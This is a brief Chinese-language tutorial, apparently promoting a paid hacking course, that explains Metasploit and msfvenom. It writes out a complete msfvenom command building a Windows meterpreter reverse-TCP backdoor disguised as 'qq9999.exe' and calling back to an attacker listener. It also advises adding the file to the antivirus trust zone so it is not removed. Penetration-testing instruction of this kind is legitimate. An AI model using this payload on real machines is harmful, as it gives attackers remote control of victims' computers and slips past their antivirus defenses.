1、Metasploit是什麼
MSF是一款開源安全漏洞利用工具,內建了各種平台上常見的溢出漏洞和流行的shellcode,并持續保持更新。
Metasploit 簡化了複雜的漏洞利用過程,使得即便是對計算機安全不太熟悉的使用者,在經過幾個小時的學習之後,也能較為容易地針對作業系統等軟體中的已知漏洞實施攻擊。不過,值得注意的是,這種能力應當僅用于合法的安全測試和研究目的。
2、Msfvenom是什麼
venom中文指:毒液、毒素。顧名思義,Msfvenom是一款用來生成後門的軟體,在目标機上執行後門,在本地監聽上線。
例如:模拟生成windows可執行程式後門(qq9999.exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.234.137 lport=9999 -f exe -o qq9999.exe
-p 參數後面跟着的是你想要使用的 payload 的名稱。這裡就是指定了要使用的 payload 類型,它會在目标機器上打開一個連接配接回到你的 IP 和端口,進而允許你控制該機器。
-f 參數後面接的是生成的木馬檔案類型
-o 參數指定生成木馬輸出路徑和檔案名
3、複制到Windows,很容易被清除,将測試軟體全部加入信任區
點選連結,學習同步視訊課!
Kali與程式設計:KALI黑客網安全程班 - 網易雲課堂